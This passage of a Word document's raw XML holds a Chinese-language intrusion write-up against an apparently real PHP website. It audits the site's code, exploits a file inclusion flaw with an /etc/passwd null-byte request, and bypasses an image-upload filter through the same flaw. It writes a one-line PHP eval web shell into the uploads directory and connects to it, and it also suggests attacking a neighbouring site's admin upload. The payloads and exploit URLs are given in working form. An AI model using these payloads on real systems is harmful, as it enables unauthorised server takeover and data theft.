        <w:br/>
        <w:t>       $go.='.php';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>       include($go);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>      else:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>       include('fun.php');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>      endif;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>     ?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DB1B8" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>&lt;form action="a0.php" method="post" name="form1" target="tmp" style="margin:1" enctype="multipart/form-data"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437A2D5" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>Ps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E87B1" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:lastRenderedPageBreak/>
        <w:t>这里存在文件包含漏洞，顺手测试了一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58619F" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>/funn/index.php?go=/etc/passwd%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6062D" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>代审的流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47B81A" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>直接在funn/index.php?go=a页面搜索post(因为你提交数据肯定是post提交给某个页面然后插入数据库的)，然后发现提交表单到a0.php。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636E896C" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>在a0.php中使用include包含文件save_gif.inc对上传的文件进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229AD51E" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>if ($mode == 'save_mydata') : </w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// --a.php form1_submit()--</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> include('addpost.inc');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $resizeMode=1;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $table = 'a_users';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $key = 'uid';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $id = $uid;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> include('save_gif.inc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EEB46B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>save_gif.inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C4283" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>if ($gif != '') :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $ti1 = strrpos($gif_name, '.');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $ext=substr($gif_name, $ti1);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $ext = strtolower($ext);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> if ($ext!='.jpg' &amp;&amp; $ext !='.gif'):</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  echo "alert('上傳圖片格式不符；只接受 jpg、gif 圖檔');\n";</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>   exit ($end);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E08D07" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>这里只能配合解析漏洞，之前信息搜集apache版本为：2.2.3，2.0之后的Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F45E6" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>但是我们这里的后缀只能是jpg、gif，apache是不可能不认识的。这里的php版本是5.3.2，php 版本&lt;5.3.4是可以进行00截断的，并且我们这里上传路径是不可控制的。上传图片马的话apache也是不一定能解析的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7941CE" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>之前发现一个文件包含漏洞这里配合文件包含，上传shell讲后缀修改为.jpg，然后使用文件包含漏洞直接拿包含文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE269F" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>http://www./funn/index.php?go=/data/userpic/177.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C70BD" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>执行之后,页面没有反应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FDC75F" w14:textId="78B84010" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05EE9FE3" wp14:editId="718AE676">
            <wp:extent cx="5274310" cy="2007870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="902343686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图片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11A46">
        <w:t>image-20201202095735183</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD650A4" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:lastRenderedPageBreak/>
        <w:t>文件没有包含进来，结合代码因该是路径有问题，要么绝对路径要么相对路径，尝试一下相对路径：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E08835" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>../../../..//data/userpic/2.jpg%00</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>../data/userpic/2.jpg%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D630EC" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>最后/data/userpic/2.jpg%00尝试成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F9524" w14:textId="1B9A8884" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E786C68" wp14:editId="57560F6C">
            <wp:extent cx="5274310" cy="2098040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="152918785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图片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98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A963E4" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>写马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6369E530" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>&lt;?PHP fputs(fopen('shell.php','w'),'&lt;?php @eval($_POST[cmd])?&gt;');?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A4797" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>无法写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E94DF1" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>尝试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285FC130" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>&lt;?php fputs(fopen('../data/userpic/shell.php','w'),'&lt;?php @eval($_POST[cmd])?&gt;');?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C830F79" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>成功。也可以尝试从旁站下手，旁站扫描：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF58845" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>https://scan.top15.cn/web/webside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879ADE3" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>在后台处可以直接上传shell文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10A9BD" w14:textId="54AD3292" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CE39A4F" wp14:editId="251C95D7">
            <wp:extent cx="5274310" cy="1949450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1836311300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图片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4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4CB46B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>右击查看文件地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B230FB" w14:textId="5DE9F0A0" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22A3C24F" wp14:editId="6892AC54">
            <wp:extent cx="5274310" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="472938297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图片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0DEB4B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:lastRenderedPageBreak/>
        <w:t>Ndata/12/m_news2/file/2302336_1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36087B7B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>连接shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E75F259" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>最后分析了一下文件下载漏洞页面的源码，这里贴一下主要的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF4A47" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>&lt;?</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> include('database.inc');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> if (strstr($f , "../")) exit();</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>else:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $ts1 = dirname($f); </w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $ts2 = basename($f);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> @readfile("..$ts1/$ts2");</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>endif;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3148B4" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>如果有'../'，直接退出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B404893" w14:textId="77777777" w:rsidR="000A4909" w:rsidRPr="00711A46" w:rsidRDefault="000A4909">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000A4909" w:rsidRPr="00711A4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9D47827" w14:textId="77777777" w:rsidR="00704A10" w:rsidRDefault="00704A10" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="49DDD94A" w14:textId="77777777" w:rsidR="00704A10" w:rsidRDefault="00704A10" w:rsidP="00711A46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7667EB" w14:textId="77777777" w:rsidR="00704A10" w:rsidRDefault="00704A10" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="499DC8A2" w14:textId="77777777" w:rsidR="00704A10" w:rsidRDefault="00704A10" w:rsidP="00711A46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766AF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="761E02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4537922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HorizontalSpacing w:val="181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7654"/>
    <w:rsid w:val="000A4909"/>
    <w:rsid w:val="002C7654"/>
    <w:rsid w:val="006A6F96"/>
    <w:rsid w:val="00704A10"/>
    <w:rsid w:val="00711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63FED3F1-3FFA-4941-A191-32B566451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1A4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11A46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11A4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11A4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0997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7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1260</Words>
  <Characters>7187</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>59</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8431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武杰 林</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>武杰 林</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-28T10:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-28T10:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>